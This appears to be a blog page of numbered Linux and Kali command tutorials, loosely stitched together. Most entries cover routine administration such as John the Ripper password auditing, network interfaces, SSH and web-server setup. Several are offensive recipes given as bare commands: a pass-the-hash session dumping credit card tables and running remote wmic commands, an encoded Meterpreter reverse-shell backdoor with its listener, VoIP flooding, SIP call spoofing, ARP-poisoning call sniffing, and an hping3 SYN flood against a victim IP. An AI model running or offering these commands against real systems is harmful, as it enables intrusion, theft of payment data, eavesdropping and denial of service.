

Debian differs from other distributions that offer John in their repositories because it offers a nice manual page, although upstream doesn't have one. To install, simply type

# aptitude install john

2.2. Fedora


On Fedora, it's also as simple as doing

# yum install john

2.3. Arch Linux

# pacman -S john

2.4. OpenSuse Linux

# zypper install john

2.5. Gentoo


As we said, Gentoo's package is named differently from what others offer, so here you will have to run

# emerge johntheripper

2.6. Slackware


Although there doesn't seem to be a john package in the official repositories, there is a slackbuild that gets John installed on your system (this was tested on Slackware 13.37).


Although we gave you just a few examples on how you can get John on your Linux system, many of the examples presented will run if you have other OS installed: besides source code, the project offers the program for BeOS, Microsoft Windows, Solaris or MacOS X. But for our article, as the title says, we tested the examples on Linux.


3. Using John the Ripper


You need not worry about cryptic configuration files, as John is ready to use with the appropriate command-line flags with no other effort on your part. One word of warning, though: as you already noticed, we tell our readers when they should use root privileges and when they shouldn't. Except when noted, you are strongly recommended to use your normal everyday user (or another, if you prefer, but it shouldn't have super user rights). On my Debian system, John is available as /usr/sbin/john, so if you don't find it we recommend you use whereis and type the whole path when running john unprivileged (or you can simply create an alias).


The simplest way to get your feet wet is to type

$ /usr/sbin/john --test

for doing some tests and benchmarks on John's capabilities. If you have no idea what Kerberos, MD5, DES or Blowfish are, we recommend you start reading some basic security books, because, like we said before, you need some security/administration background. Now, let's create a text file in password format (<user>:<hash>) with a valid hash, of course, and get John to work. You can simply copy a user from /etc/shadow, but we recommend something simpler, because we presume you want to see the results as fast as you can. So create a file named password.txt somewhere inside your /home and put this in it:

myuser:AZl.zWwxIh15Q

Save the file, then simply feed it to John with no arguments (for now):

$ /usr/sbin/john password.txt

We must repeat our warning: password cracking is a CPU-intensive and long process, so depending on your system, that might take quite a while. However, this also depends on what you want to achieve, because if your powerful CPU has been crunching at the password(s) for days with no outcome, it's only safe to say that it's a good password. But if the password is really critical, leave the system until John finishes its work to make sure everything is alright. Like we said before, this could take many days.


Now, if you have a powerful box with the sole purpose of testing passwords, which is always a good thing given the means, you can try your real-life passwords with John. One way is to use /etc/shadow directly, but we recommend you take a somewhat different course. Note that this applies to systems using shadow passwords, and all the modern Linux distributions do. John offers a nifty utility called unshadow, which we will use to create a file from our passwd and shadow files:

# unshadow /etc/passwd /etc/shadow > mypasswd.txt

Now make sure that mypasswd.txt is available to your normal user and do

$ /usr/sbin/john mypasswd.txt
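Before spending CPU time on a file like mypasswd.txt, it helps to see which hash schemes it contains and to confirm that only your user can read it. The script below is an added example, not part of the original article or of John itself; the function names and all sample entries except the article's myuser line are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): audit an unshadow-style file
# (user:hash:uid:gid:gecos:home:shell) for legacy hash schemes and loose perms.

# classify_hashes FILE -> one "user scheme" pair per line
classify_hashes() {
    awk -F: '{
        h = $2; p1 = substr(h, 1, 1); p3 = substr(h, 1, 3)
        if (h == "")                      s = "empty"
        else if (p1 == "!" || p1 == "*")  s = "locked"
        else if (p3 == "$1$")             s = "md5crypt"
        else if (substr(h, 1, 2) == "$2") s = "bcrypt"
        else if (p3 == "$5$")             s = "sha256crypt"
        else if (p3 == "$6$")             s = "sha512crypt"
        else if (p3 == "$y$")             s = "yescrypt"
        else if (length(h) == 13 && h ~ "^[./0-9A-Za-z]+$") s = "descrypt"
        else                              s = "unknown"
        print $1, s
    }' "$1"
}

# weak_accounts FILE -> users on legacy schemes (DES crypt, MD5 crypt)
# or with no password at all
weak_accounts() {
    classify_hashes "$1" |
        awk '$2 == "descrypt" || $2 == "md5crypt" || $2 == "empty" { print $1 }'
}

# is_private FILE -> success only if group and others have no access at all
is_private() {
    [ "$(ls -ld "$1" | cut -c5-10)" = "------" ]
}

# Constructed sample input; every hash except the myuser entry taken from the
# article is a made-up placeholder, not a real digest.
sample=$(mktemp)            # mktemp creates the file with mode 0600
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
root:$6$ExampleSalt$ConstructedPlaceholderNotARealHash:0:0:root:/root:/bin/bash
myuser:AZl.zWwxIh15Q:1000:1000::/home/myuser:/bin/bash
legacy:$1$ExampleS$ConstructedPlaceholderHash:1001:1001::/home/legacy:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
guest::1002:1002::/home/guest:/bin/sh
EOF

classify_hashes "$sample"
echo "weak: $(weak_accounts "$sample" | tr '\n' ' ')"
is_private "$sample" && echo "permissions ok" || echo "file is readable by others"
```
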

John will try single crack mode first, then wordlist mode, then incremental. In John's terms, a mode is a method it uses to crack passwords. As you know, there are many kinds of attacks: dictionary attacks, brute force attacks, and so on. Well, this is roughly what John's modes are. As some of you might have realized, wordlist mode is basically a dictionary attack. Besides these three modes enumerated above, John also supports another one called external mode. You can select what mode to use with, for example, --single, --external and so on. We recommend you check out the documentation over at openwall.com for a good but brief description of every mode. But of course we will tell you, in short, what every mode does.


John the Ripper's documentation recommends starting with single crack mode, mostly because it's faster and even faster if you use multiple password files at a time. Incremental mode is the most powerful mode available, as it will try various combinations when cracking, and you can choose what kind of mode (mode applied to the incremental option) to use, including your own. External mode, as the name implies, will use custom functions that you write yourself, while wordlist mode takes a word list specified as an argument to the option (it can be a file with a list of words written one per line, or stdin) and tries a simple dictionary attack on passwords.


If John is successful in cracking one of the passwords, it will write to ~/.john/john.pot. However, that file isn't human-readable, so you can read cracked passwords with

$ /usr/sbin/john --show mypasswd.txt

To check if the root password got cracked, filter by UID:

$ /usr/sbin/john --show --users=0 mypasswd.txt

Of course, John knows about wildcards and multiple files:

$ /usr/sbin/john --show --users=0 *passwd*

Just as you can filter by user, you can also filter by group, by using the --groups flag, and that filtering is available also when cracking. Going further to wordlist mode, here's how you can use it with the built-in mangling rules enabled:

$ /usr/sbin/john --wordlist=passwd.lst --rules passwd.txt

John also allows you to create multiple named sessions, which is practical, because since John can take lots of time to complete a task, you can later view all sessions running to decide which one to kill. The option for named sessions is --session=taskname and you can use --status or --status=taskname to see all or certain sessions. But there's more: you can restore sessions or particular ones by name using --restore or --restore=taskname. A few examples:

$ /usr/sbin/john --session=allrules --wordlist=all.lst --rules mypasswd.txt
$ /usr/sbin/john --status=allrules
$ ps aux | grep john # get the PID of the john session you want to kill
$ kill -HUP $PID_of_john_session_to_kill
$ /usr/sbin/john --restore=allrules

Here's some examples of using incremental mode with John:

$ /usr/sbin/john --incremental mypasswd.txt
$ /usr/sbin/john --incremental=alpha mypasswd.txt

Of course, this isn't a replacement of John's documentation. Although, as we said, it doesn't offer a manual page, you will find lots of documentation on its page, as well as a useful wiki. For example, you will notice that even if you're running John on a multiprocessor machine, it will use only one core, usually the first. You can address this problem by reading the documentation and following the instructions there.

                           tutorial #2

configure a virtual network interface.

1. Introduction

Did you know that you can assign more than one IP address to a single physical network interface? This technique is quite useful, for example when working with Apache and virtual hosts, as it allows you to access the same Apache server by using two different IP addresses.

2. Temporary virtual network interface

The process of creating a virtual network interface in Linux is a quite simple matter. It involves a single execution of the ifconfig command.

ifconfig eth0:0 123.123.22.22

The above command will create a new virtual network interface based on the original eth0 physical interface. The only important condition for creating the virtual network interface is that the physical network interface, in our case eth0, must exist. The whole example is shown below:

# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 3c:97:0e:02:98:c8
inet addr:192.168.100.23 Bcast:192.168.100.255
Mask:255.255.255.0
# ping 192.168.100.23
PING 192.168.100.23 bytes of data.
64 bytes from 192.168.100.23 time=0.023 ms
64 bytes from 192.168.100.23 time=0.059 m

At this point we can configure a new virtual interface based on eth0. Once you execute the ifconfig command the new virtual interface will be immediately ready to use.

# ifconfig eth0:0
eth0:0 Link encap:Ethernet HWaddr 3c:97:0e:02:98:c8
UP BROADCAST MULTICAST MTU:1500 Metric:1
Interrupt:20 Memory:f1600000-f1620000

# ifconfig eth0:0 123.123.22.22
# ifconfig eth0:0
eth0:0 Link encap:Ethernet HWaddr 3c:97:0e:02:98:c8
inet addr:123.123.22.22 Bcast:123.255.255.255 Mask:255.0.0.0
# ping 123.123.22.22
PING 123.123.22.22 (123.123.22.22) 56(84) bytes of data.
64 bytes from 123.123.22.22: icmp_req=1 ttl=64 time=0.060 ms
64 bytes from 123.123.22.22: icmp_req=2 ttl=64 time=0.057 ms

2.1.  Disable virtual network interface

To disable our temporary network interface created earlier we can use the ifconfig command again but with a down flag.

# ifconfig eth0:0 down

3. Virtual address permanent assignment

The above configuration would not last after reboot. If you wish the virtual network interface to be permanent you would need to modify config files relevant to your particular Linux distribution. Below, you can find information describing this procedure for the major Linux distributions:

3.1. Debian / Ubuntu

3.1.1. Static

For Debian or Ubuntu Linux you need to edit /etc/network/interfaces file with your favorite text editor and add the following lines:

iface eth0:0 inet static
address 123.123.22.22
netmask 255.0.0.0
broadcast 123.255.255.255

3.1.2. Dhcp

It is also possible to use virtual network interface with DHCP. In that case, you will need to add to your /etc/network/interfaces the following line.

iface eth0:0 inet dhcp

To apply your change restart the network with:

# /etc/init.d/networking restart

3.2. Redhat / Fedora / CentOS

3.2.1. Static

For Redhat, Fedora or CentOS Linux the directory responsible for permanent IP address assignment is /etc/sysconfig/network-scripts. In this directory you need to create a file corresponding to your new virtual interface. In our case, that will be a file called: ifcfg-eth0:0 . Create this new file and insert following lines to make your virtual address assignment permanent after reboot:

DEVICE=eth0:0
IPADDR=123.123.22.22
NETMASK=255.0.0.0
NETWORK=123.0.0.0
BROADCAST=123.255.255.255
ONBOOT=yes

3.2.2. Dhcp

DEVICE=eth0:0
BOOTPROTO=dhcp
ONBOOT=yes

Once ready restart your interfaces with:

# service network restart

4. Conclusion

In the old days one physical server served a single website. This is no longer a viable option for hosting websites today so ability of an operating system to create virtual network interface is really a must.

                                       tutorial #3

How to change MySQL user password from command line using mysqladmin on Linux


# mysqladmin -u root password 'newpass'
# mysqladmin -u root -pnewpass
# mysqladmin -u root -pabc123

                                     tutorial #4


How to shrink USB clone DD file image output



# sfdisk -l -uM ubuntu_USB.img
# ls -lh ubuntu_USB.img
# fdisk -l -u ubuntu_USB.img
# dd if=ubuntu_USB.img of=ubuntu_USB.iso count=6146047
# dd if=/dev/sdX of=ubuntu_USB.iso count=6146047
$ ls -lh ubuntu_USB.iso

                                    tutorial #5

How to promote Mediawiki user with sysop and bureaucrat privileges

$ mysql -u USER -p

mysql> use wiki

mysql> SELECT user_id, CONVERT(user_name USING utf8) FROM `user`;

mysql> INSERT INTO `user_groups` VALUES (2, 'sysop'),(2, 'bureaucrat');

                                   tutorial #6

How to install SSH Server on Ubuntu 16.04 Xenial Linux

$ sudo apt-get install ssh

$ sudo service ssh start

$ sudo systemctl enable ssh

                                  tutorial #7


How to disable NGINX logging on Linux system


access_log /var/log/nginx/access.log;

error_log /var/log/nginx/error.log;

service nginx reload

                                 tutorial #8


passing-the-hash-Attack

# cat /opt/pth/etc/freetds.conf

# sqsh -S mysql -D master -U demo\\mssql -P hashcodename 

[1] mssql.master.1> select @@version

[1] mssql.master.1> go

[1] mssql.master.1> select * from sys.databases

[1] mssql.master.1> go

[1] mssql.master.1>  use adventureworks2008

[1] mssql.master.1> go

[1] mssql.adventureworks2008.1> select * from information_schema.columns where table name like 'credit card'

[1] mssql.adventureworks2008.1> go

[1] mssql.adventureworks2008.1>select * from sales.creditcard

[1] mssql.adventureworks2008.1> go

[1] mssql.adventureworks2008.1> select * from sales.creditcard where cardtype = 'vista'

[1] mssql.adventureworks2008.1> go

open new terminal

# /opt/pth/bin/firefox

open new terminal 

# mapiprofile -P user -u user -p hashcode -D demo.local -I ipaddress --create

# openchangeclient -p user -S -t otheruser@demo.local -s "command line test with openchange" -B "message"

# exchange2inbox -p user -m mail/user

# alpine 

open new terminal 

# wmic -U demo/administrator\hashcode //ipaddress "select name,processid from win32_process" | less

# wmic -U administrator\hashcode //ipaddress "cmd.exe /c dir c:\ > \windows\temple.txt"

# smbget -w test.local -u demo\\administrator -O smb://ipadress/c$/windows/temp/o.txt -p hashcode

               

                                                                  Sniffing on VoIP Network

1. ./sipdump pass.txt -p aa.pcap

2../svcrack.py -u600 -d list.txt voIPipaddress

dos attack (denial of service attack) the VOIP NETWORK

3. ./iaxflood 192.168.1.13 192.168.1.2 10000

4. msfconsole

5. msf > use auxiliary/scanner/sip/options

6. msf auxiliary(options) > set RHOSTS voIPipaddress

7. msf auxiliary(options) > run

                                       tutorial #9

                                                                 

                  Linux command line to turn off proxy

1. cat /etc/environment

2. env | grep -i proxy

3. man env

4. man set

5. man bash

6. unset HTTP_PROXY

7. gconftool-2 -a /system/http_proxy

8. gconftool-2 -t bool -s /system/http_proxy/use_http_proxy false

9. gconftool-2 -t string -s /system/http_proxy/host "http://newproxy.mydomain.org/"

10. gconftool-2 -t int -s /system/http_proxy/port 8088

11. export http_proxy=

12. echo $http_proxy

                                 tutorial #10

                        How To Set Up SSH Keys

1.ssh-keygen -t rsa

2.ssh-copy-id user@ipaddress

3.cat ~/.ssh/id_rsa.pub | ssh user@ipaddress "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"

4.sudo nano /etc/ssh/sshd_config

#PermitRootLogin without-password

#reload ssh

                                    tutorial #11

                       xmlrpc attack on wordpress

The WordPress XML-RPC ping attack is pretty annoying. The XML-RPC issue can get insane.

$ sudo tail -100000 /var/log/apache2/access.log | grep /xmlrpc.php

                                   tutorial #12

   How To Protect WordPress from XML-RPC attacks

$ grep xmlrpc /var/log/apache2/access.log

$ grep xmlrpc /var/log/nginx/access.log

$ sudo a2enconf block-xmlrpc

$ sudo service apache2 restart

$ sudo nano /etc/apache2/sites-available/000-default.conf

$ sudo service apache2 restart

$ sudo nano /etc/nginx/sites-available/example.com

$ sudo service nginx restart
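A plain grep for xmlrpc also matches harmless GET requests and search queries that merely mention the file name. The script below is an added example, not part of the original tutorial: it counts only POST requests to /xmlrpc.php per client address in a combined-format access log. The function name xmlrpc_top, the threshold argument and the sample log lines (documentation-range IP addresses) are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): summarise POSTs to /xmlrpc.php
# per client from an Apache/Nginx access log in combined format.

# xmlrpc_top FILE [MIN] -> "count ip" lines, busiest first, for clients with
# at least MIN (default 1) POST requests to /xmlrpc.php
xmlrpc_top() {
    awk -v min="${2:-1}" '
        # whitespace-split fields: $1 client, $6 "\"METHOD", $7 request path
        $6 == "\"POST" && $7 ~ /^\/xmlrpc\.php([?]|$)/ { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= min) print hits[ip], ip }
    ' "$1" | sort -k1,1nr -k2,2
}

# Constructed sample log lines (not real traffic).
log=$(mktemp)
trap 'rm -f "$log"' EXIT
cat > "$log" <<'EOF'
203.0.113.7 - - [10/Oct/2016:13:55:36 +0000] "POST /xmlrpc.php HTTP/1.0" 200 370 "-" "Mozilla/4.0 (compatible)"
203.0.113.7 - - [10/Oct/2016:13:55:37 +0000] "POST /xmlrpc.php HTTP/1.0" 200 370 "-" "Mozilla/4.0 (compatible)"
203.0.113.7 - - [10/Oct/2016:13:55:38 +0000] "POST /xmlrpc.php HTTP/1.0" 200 370 "-" "Mozilla/4.0 (compatible)"
198.51.100.23 - - [10/Oct/2016:13:56:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WordPress/4.6"
198.51.100.23 - - [10/Oct/2016:13:56:05 +0000] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "curl/7.47.0"
192.0.2.10 - - [10/Oct/2016:13:57:12 +0000] "GET /?s=xmlrpc.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF

xmlrpc_top "$log"        # every client that posted to the endpoint
xmlrpc_top "$log" 3      # only clients at or above a threshold of 3
```

Point it at /var/log/apache2/access.log or /var/log/nginx/access.log in place of the sample file to decide which sources need blocking before and after the configuration change.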

                                     tutorial #13

                         How To Secure HAProxy

HAProxy with Let's Encrypt TLS/SSL Certificate and Auto-renewal

 

     $ sudo apt-get update

    $ sudo apt-get -y install git bc

    $ sudo git clone https://github.com/letsencrypt/letsencrypt /opt/letsencrypt

    $ sudo service haproxy stop

    $ netstat -na | grep ':80.*LISTEN'

    $ cd /opt/letsencrypt

    $ ./letsencrypt-auto certonly --standalone

    Email prompt


   Let's Encrypt Subscriber's Agreement


          Domain name prompt

            $ sudo ls /etc/letsencrypt/live/your_domain_name

            $ sudo mkdir -p /etc/haproxy/certs

            $ sudo -E bash -c 'cat /etc/letsencrypt/live/$DOMAIN/fullchain.pem /etc/letsencrypt/live/$DOMAIN/privkey.pem > /etc/haproxy/certs/$DOMAIN.pem'

           $ sudo chmod -R go-rwx /etc/haproxy/certs

           $ sudo add-apt-repository ppa:vbernat/haproxy-1.6

           $ sudo apt-get update

           $ sudo apt-get install haproxy

           $ sudo nano /etc/haproxy/haproxy.cfg

          $ sudo service haproxy restart

          $ cd /opt/letsencrypt

          $ ./letsencrypt-auto certonly --agree-tos --renew-by-default --standalone-supported-challenges http-01 --http-01-port 54321 -d example.com -d www.example.com

          $ sudo service haproxy reload

          $ sudo cp /opt/letsencrypt/examples/cli.ini /usr/local/etc/le-renew-haproxy.ini

          $ sudo nano /usr/local/etc/le-renew-haproxy.ini

          $ cd /opt/letsencrypt

          $ ./letsencrypt-auto certonly --renew-by-default --config /usr/local/etc/le-renew-haproxy.ini --http-01-port 54321

          $ sudo curl -L -o /usr/local/sbin/le-renew-haproxy https://gist.githubusercontent.com/thisismitch/7c91e9b2b63f837a0c4b/raw/700cfe953e5d5e71e528baf20337198195606630/le-renew-haproxy

          $ sudo chmod +x /usr/local/sbin/le-renew-haproxy

          $ sudo le-renew-haproxy

          $ sudo crontab -e          

                                      tutorial #14

                         Install Apache HTTP Server

$ yum install httpd -y

$ service httpd start

$ chkconfig httpd on

$ vim /etc/sysconfig/iptables

add the following lines:

[….]

-A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT

[….]

$ service iptables restart

$ netstat -tulpn | grep :80

                                       tutorial #15

                            Install MySQL Server  

 

# yum install mysql mysql-server -y

# service mysqld start

# chkconfig mysqld on

# mysql_secure_installation

                                       tutorial #16

                                  PHP Installation  

 

# yum install php -y

# vi /var/www/html/infophp.php

Add the following lines.

<?php

phpinfo();

?>

# service httpd restart

# yum install php-mysql -y

                                        tutorial #17

                             phpMyAdmin Installation

# wget http://epel.mirror.net.in/epel/6/i386/epel-release-6-8.noarch.rpm

# rpm -Uvh epel-release-6-8.noarch.rpm

# yum install phpmyadmin -y

# vim /etc/httpd/conf.d/phpMyAdmin.conf

# cp /usr/share/phpMyAdmin/config.sample.inc.php /usr/share/phpMyAdmin/config.inc.php

# vim /usr/share/phpMyAdmin/config.inc.php

# service httpd restart


                             

                                      tutorial #18

                                How to Setup NFS

# yum install nfs-utils nfs-utils-lib

# yum install portmap

# apt-get install nfs-utils nfs-utils-lib

# /etc/init.d/portmap start

# /etc/init.d/nfs start

# chkconfig --level 35 portmap on

# chkconfig --level 35 nfs on

# mkdir /nfsshare

# vi /etc/exports

add this line:

/nfsshare 192.168.0.101(rw,sync,no_root_squash)

# showmount -e 127.0.0.1

# mount -t nfs 127.0.0.1:/nfsshare /mnt/nfsshare

# mount | grep nfs

# vi /etc/fstab

add this line:

127.0.0.1:/nfsshare /mnt nfs defaults 0 0

# cat > /nfsshare/nfstest.txt

# ll /mnt/nfsshare

# umount /mnt/nfsshare

# df -h -F nfs

                                    tutorial  #19

                     restrict sftp user to chroot jail

# groupadd sftpgroup

# usermod -G sftpgroup tecmint

# adduser senthil -g sftpgroup -s /sbin/nologin

# passwd tecmint

# sudo nano /etc/ssh/sshd_config

# systemctl restart sshd

# chmod 700 /home/tecmint

# ssh tecmint@127.0.0.1

# sftp tecmint@127.0.0.1

sftp> pwd

sftp> ls

sftp> cd tecmint

sftp> mkdir test

# groupadd sftpgroup

# mkdir -p /sftpusers/chroot

# chown root:root /sftpusers/chroot/

# adduser tecmint -g sftpgroup -s /sbin/nologin

# passwd tecmint

# mkdir /sftpusers/chroot/tecmint

# chown tecmint:sftpgroup /sftpusers/chroot/tecmint/

# chmod 700 /sftpusers/chroot/tecmint/

# systemctl restart sshd

                                     tutorial #20


                               Create A Backdoor

# msfpayload windows/meterpreter/reverse_tcp LHOST=[local ip]  LPORT=[local port] R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/filename -o /root/Desktop/filename


msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.62.130

msf exploit(handler) > set LPORT 443

msf exploit(handler) > exploit

                                    tutorial #21

                      How To Add a Non Root User

Kali Linux 2.0 Kali Sana tutorials add user


useradd -m newusername -G sudo -s /bin/bash

passwd newusername

                                   tutorial #22

                             Flood network lan

                         in the video down below




 

                             





                                      tutorial #23

                                                                           setup a dummy printer

$ sudo lpadmin -p myprinter -E -v file:///dev/null

$ sudo lpstat -s

$ sudo lpoptions -d myprinter

                                     tutorial #24

                                                           populate a file with random data

$ head -c 1G </dev/urandom >myfile

$ head -c 1073741824 </dev/urandom >myfile

$ dd bs=1024 count=1048576 </dev/urandom >myfile

                                     tutorial #25

                                                                     create a dummy interface

$ /sbin/ip li add dummy0 type dummy

                                     tutorial #26

                  Create a Large Dummy File in Linux

dd if=/dev/zero of=filename bs=1000000000 count=1

du -h filename

                                     tutorial #27

                        SIP Invite Spoof(fake call)

# msfconsole

# msf> use auxiliary/VOIP/SIP_INVITE_SPOOF

# MSF> SHOW OPTIONS

# MSF > SET DOMAIN 15261@SIP.SFLPHONE.ORG

# MSF > SET SCRADDR IPADDRESS

# MSF > SET RHOSTS IPADDRESS/RANGE

# MSF > RUN

                                      tutorial #28                                                               

                           How to sniff VoIP calls

# ettercap -t -m arp -i wlan0 ///

note: then pull up wireshark, go to the interface "wlan0" and "start" the capture, then hit ctrl+c in the terminal and stop the capture, then go to telephony > voip calls and listen to phone calls

                                     tutorial #29

                   mask ipaddress using OPENvpn


  1. su
  2. mkdir vpncfg
  3. cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* vpncfg/
  4. cd vpncfg/
  5. vim vars
  6. Replace necessary fields in the file.
  7. source vars
  8. ./clean-all
  9. ./build-ca
  10. ./build-key-server nullbytez
  11. Sign the certificate.
  12. ./build-key <name>
  13. ./build-dh
  14. mkdir ~/yourkeys
  15. cd keys/
  16. cp -v ca.crt <name>.{crt,key} ~/yourkeys/
  17. cp -v dh1024.pem nullbytez.{key,crt} ca.crt
  18. echo "1" > /proc/sys/net/ipv4/ip_forward
  19. iptables -t nat -A POSTROUTING -s 10.0.69.0/24 -o eth0 -j MASQUERADE -v
  20. vim /etc/openvpn/openvpn.conf
  21. openvpn client.conf


                                   tutorial #30

                                   ddos attack

#hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source (Victim IP)